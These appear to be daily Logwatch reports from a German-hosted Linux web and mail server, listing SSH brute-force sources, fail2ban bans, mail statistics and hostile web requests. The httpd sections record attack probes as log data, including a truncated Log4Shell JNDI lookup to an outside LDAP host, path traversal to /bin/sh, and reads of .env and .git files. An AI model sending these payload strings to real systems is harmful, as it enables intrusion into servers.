/owa/auth/x.js: 1 Time(s)
/remote/login: 1 Time(s)
/sitemap.xml: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (129.204.202.109): 36 Time(s)
root (106.55.47.184): 35 Time(s)
root (217.117.14.248): 31 Time(s)
root (185.248.140.135): 28 Time(s)
unknown (185.248.140.135): 21 Time(s)
root (153.35.93.67): 18 Time(s)
unknown (129.204.202.109): 14 Time(s)
unknown (106.55.47.184): 13 Time(s)
unknown (217.117.14.248): 13 Time(s)
root (103.235.170.162): 12 Time(s)
unknown (153.35.93.67): 12 Time(s)
unknown (103.235.170.162): 11 Time(s)
root (134.17.16.37): 9 Time(s)
unknown (134.17.16.37): 9 Time(s)
unknown (144.126.208.202): 6 Time(s)
root (161.35.45.62): 4 Time(s)
root (170.245.14.173): 4 Time(s)
unknown (131.100.65.224): 2 Time(s)
unknown (62.233.50.133): 2 Time(s)
unknown (91.188.188.134): 2 Time(s)
unknown (93-45-34-56.ip100.fastwebnet.it): 2 Time(s)
unknown (dynamic-077-190-139-042.77.190.pool.telefonica.de): 2 Time(s)
root (164.92.221.55): 1 Time(s)
root (178.128.33.227): 1 Time(s)
root (92.255.85.146): 1 Time(s)
unknown (161.35.45.62): 1 Time(s)
unknown (170.245.14.173): 1 Time(s)
unknown (178.213.248.102): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
unknown (45.153.160.133): 1 Time(s)
unknown (89.163.249.192): 1 Time(s)
unknown (this-is-a-tor-node---10.artikel5ev.de): 1 Time(s)
www-data (185.248.140.135): 1 Time(s)
Invalid Users:
Unknown Account: 116 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
6.601K Bytes accepted 6,759
6.601K Bytes sent via SMTP 6,759
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
96 Connections
2 Connections lost (inbound)
96 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
92.255.85.146: 1 time
103.235.170.162: 12 times
106.55.47.184: 35 times
129.204.202.109: 36 times
134.17.16.37 (37-16-17-134-cloud.mts.by): 9 times
153.35.93.67: 18 times
161.35.45.62: 4 times
164.92.221.55: 1 time
170.245.14.173 (neorede.com.br): 4 times
178.128.33.227: 1 time
185.248.140.135 (shelp-app.de): 29 times
217.117.14.248: 31 times
Illegal users from:
2001:470:1:c84::16: 1 time
undef: 73 times
45.141.84.10: 1 time
45.153.160.133: 1 time
62.233.50.133: 2 times
64.62.197.152: 1 time
77.190.139.42 (dynamic-077-190-139-042.77.190.pool.telefonica.de): 2 times
89.163.249.192 (srv1116.dedicated.server-hosting.expert): 1 time
91.188.188.134 (ip-134.cifra1.ru): 2 times
93.45.34.56 (93-45-34-56.ip100.fastwebnet.it): 2 times
103.235.170.162: 11 times
106.55.47.184: 13 times
129.204.202.109: 14 times
131.100.65.224: 2 times
134.17.16.37 (37-16-17-134-cloud.mts.by): 9 times
144.126.208.202: 6 times
152.32.131.197: 1 time
153.35.93.67: 12 times
161.35.45.62: 1 time
170.245.14.173 (neorede.com.br): 1 time
172.104.140.107 (172-104-140-107.ip.linodeusercontent.com): 1 time
178.213.248.102: 1 time
185.170.114.25 (this-is-a-tor-node---10.artikel5ev.de): 1 time
185.248.140.135 (shelp-app.de): 21 times
217.117.14.248: 13 times
**Unmatched Entries**
fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s)
Protocol major versions differ for 172.104.140.107: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s)
Protocol major versions differ for 172.104.140.107: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 9 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Jan 2 04:42:04 2022
Date Range Processed: yesterday
( 2022-Jan-01 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 13:13 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
45.88.109.151 -> 49.12.205.139:4444: 1 Time(s)
54.183.214.154 -> zapf.wiki:443: 2 Time(s)
92.118.234.202 -> zapf.wiki:443: 9 Time(s)
A total of 6 sites probed the server
159.223.48.169
178.239.21.103
185.142.236.40
185.163.109.66
195.133.40.56
20.114.43.135
Requests with error response codes
400 Bad Request
zapf.wiki:443: 11 Time(s)
null: 7 Time(s)
/phpmyadmin/scripts/setup.php: 4 Time(s)
/: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/27383555: 1 Time(s)
/admin/config.php: 1 Time(s)
/goettingen: 1 Time(s)
49.12.205.139:4444: 1 Time(s)
7: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 3 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/owa/auth/logon.aspx: 2 Time(s)
///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/Telerik.Web.UI.WebResource.axd?type=rau: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/bag2: 1 Time(s)
/cgi-bin/config.exp: 1 Time(s)
/console/: 1 Time(s)
/epa/scripts/win/nsepa_setup.exe: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
502 Bad Gateway
/D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (103.161.39.186): 28 Time(s)
root (197.255.225.96): 18 Time(s)
root (106.12.220.24): 17 Time(s)
root (124.43.9.184): 17 Time(s)
unknown (103.161.39.186): 14 Time(s)
unknown (106.12.220.24): 10 Time(s)
unknown (144.126.208.202): 9 Time(s)
root (185.74.4.189): 7 Time(s)
unknown (185.74.4.189): 6 Time(s)
unknown (124.43.9.184): 5 Time(s)
unknown (197.255.225.96): 4 Time(s)
root (167.99.88.94): 1 Time(s)
unknown (185.90.136.69): 1 Time(s)
unknown (slot0.epaperitaliait.com): 1 Time(s)
Invalid Users:
Unknown Account: 50 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10.902K Bytes accepted 11,164
10.902K Bytes sent via SMTP 11,164
======== ==================================================
2 Accepted 100.00%
-------- --------------------------------------------------
2 Total 100.00%
======== ==================================================
4 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
4 Total 4xx Rejects 100.00%
======== ==================================================
254 Connections
66 Connections lost (inbound)
254 Disconnections
2 Removed from queue
2 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
103.161.39.186: 28 times
106.12.220.24: 17 times
124.43.9.184: 17 times
167.99.88.94: 1 time
185.74.4.189: 7 times
197.255.225.96: 18 times
Illegal users from:
2001:470:1:c84::29: 1 time
undef: 36 times
64.62.197.92: 1 time
103.161.39.186: 14 times
106.12.220.24: 10 times
106.75.184.237 (szfbk.cn): 1 time
124.43.9.184: 5 times
144.126.208.202: 9 times
185.74.4.189: 6 times
185.90.136.69 (ksort-fi41-sort.betmam.com): 1 time
195.133.18.24 (slot0.epaperitaliait.com): 1 time
197.255.225.96: 4 times
**Unmatched Entries**
Protocol major versions differ for 134.122.134.188: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 9 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Jan 1 04:42:04 2022
Date Range Processed: yesterday
( 2021-Dec-31 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 53:53 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
54.183.214.154 -> zapf.wiki:443: 1 Time(s)
92.118.234.202 -> zapf.wiki:443: 7 Time(s)
A total of 10 sites probed the server
159.223.48.169
165.227.221.200
178.62.78.53
185.107.195.5
188.166.181.21
195.133.40.56
34.96.130.19
45.134.144.108
46.101.18.159
54.234.218.242
Requests with error response codes
400 Bad Request
null: 23 Time(s)
zapf.wiki:443: 8 Time(s)
mstshash=Domain: 4 Time(s)
/phpmyadmin/scripts/setup.php: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/: 1 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
HTTP/1.0: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//2020/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
500 Internal Server Error
/: 40 Time(s)
/robots.txt: 3 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/.git/HEAD: 1 Time(s)
///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/login.cs: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (67.205.162.21): 33 Time(s)
root (118.89.162.250): 32 Time(s)
root (178.154.196.230): 32 Time(s)
root (42.193.184.210): 32 Time(s)
root (106.12.194.13): 31 Time(s)
root (81.68.93.27): 31 Time(s)
root (1.116.25.72): 29 Time(s)
unknown (139.59.44.143): 24 Time(s)
root (146.56.192.231): 23 Time(s)
root (180.250.248.170): 22 Time(s)
root (203.205.37.224): 20 Time(s)
root (202.112.61.110): 19 Time(s)
unknown (106.12.194.13): 19 Time(s)
unknown (202.21.123.198): 19 Time(s)
unknown (1.116.25.72): 18 Time(s)
unknown (118.89.162.250): 18 Time(s)
unknown (42.193.184.210): 18 Time(s)
unknown (178.154.196.230): 17 Time(s)
unknown (67.205.162.21): 17 Time(s)
unknown (81.68.93.27): 16 Time(s)
root (185.74.4.189): 15 Time(s)
root (217.117.14.248): 15 Time(s)
unknown (146.56.192.231): 15 Time(s)
unknown (185.74.4.189): 10 Time(s)
unknown (144.126.208.202): 9 Time(s)
root (118.195.145.14): 8 Time(s)
unknown (202.112.61.110): 8 Time(s)
unknown (203.205.37.224): 8 Time(s)
root (62.209.63.32): 7 Time(s)
unknown (180.250.248.170): 7 Time(s)
root (104.244.73.93): 6 Time(s)
root (monero.mnpnk.com): 6 Time(s)
unknown (217.117.14.248): 5 Time(s)
root (139.59.44.143): 4 Time(s)
root (14.143.137.18): 4 Time(s)
root (134.17.16.92): 3 Time(s)
root (162.243.20.232): 3 Time(s)
unknown (118.195.145.14): 3 Time(s)
unknown (162.243.20.232): 3 Time(s)
root (202.21.123.198): 2 Time(s)
unknown (134.17.16.92): 2 Time(s)
unknown (199.195.253.100): 2 Time(s)
unknown (209.141.44.198): 2 Time(s)
unknown (modemcable254.188-200-24.mc.videotron.ca): 2 Time(s)
postgres (81.68.93.27): 1 Time(s)
root (120.230.104.74): 1 Time(s)
root (178.128.216.205): 1 Time(s)
root (tor-exit.a9.wtf): 1 Time(s)
root (tor-project-exit1.dotsrc.org): 1 Time(s)
unknown (14.143.137.18): 1 Time(s)
unknown (178.213.248.102): 1 Time(s)
unknown (203.128.242.166): 1 Time(s)
Invalid Users:
Unknown Account: 245 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9.722K Bytes accepted 9,955
9.722K Bytes sent via SMTP 9,955
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
196 Connections
7 Connections lost (inbound)
196 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 2 Time(s)
Failed logins from:
1.116.25.72: 29 times
14.143.137.18 (14.143.137.18.static-pune.vsnl.net.in): 4 times
42.193.184.210: 32 times
62.209.63.32: 7 times
67.205.162.21: 33 times
81.68.93.27: 32 times
104.244.73.93 (LuxembourgTor3): 6 times
104.244.74.28 (tor-exit.a9.wtf): 5 times
106.12.194.13: 31 times
118.89.162.250: 32 times
118.195.145.14: 8 times
120.230.104.74: 1 time
134.17.16.92 (92-16-17-134-cloud.mts.by): 3 times
139.59.44.143: 4 times
146.56.192.231: 23 times
162.243.20.232: 3 times
178.128.216.205: 1 time
178.154.196.230: 32 times
180.250.248.170: 22 times
185.74.4.189: 15 times
185.129.61.1 (tor-project-exit1.dotsrc.org): 4 times
202.21.123.198: 2 times
202.112.61.110: 19 times
203.205.37.224 (static.cmcti.vn): 20 times
209.141.34.232 (monero.mnpnk.com): 6 times
217.117.14.248: 15 times
Illegal users from:
2001:470:1:332::2 (the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time
undef: 187 times
1.116.25.72: 18 times
14.143.137.18 (14.143.137.18.static-pune.vsnl.net.in): 1 time
24.200.188.254 (modemcable254.188-200-24.mc.videotron.ca): 2 times
42.193.184.210: 18 times
45.88.137.100: 1 time
65.49.20.69 (scan-20.shadowserver.org): 1 time
67.205.162.21: 17 times
81.68.93.27: 16 times
106.12.194.13: 19 times
118.89.162.250: 18 times
118.195.145.14: 3 times
134.17.16.92 (92-16-17-134-cloud.mts.by): 2 times
139.59.44.143: 24 times
144.126.208.202: 9 times
146.56.192.231: 15 times
162.243.20.232: 3 times
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
178.154.196.230: 17 times
178.213.248.102: 1 time
180.250.248.170: 7 times
185.74.4.189: 10 times
199.195.253.100: 2 times
202.21.123.198: 19 times
202.112.61.110: 8 times
203.128.242.166: 1 time
203.205.37.224 (static.cmcti.vn): 8 times
209.141.44.198: 2 times
217.117.14.248: 5 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 9 Monate
- 1
- 0
Cron <root@h2361197> /usr/sbin/nginx -s reload
by root@zapf.in
nginx: [warn] conflicting server name "xn--studienfhrer-physik-dbc.de" on 0.0.0.0:80, ignored
nginx: [warn] conflicting server name "topf.zapf.in" on 0.0.0.0:80, ignored
3 Jahre, 9 Monate
- 1
- 0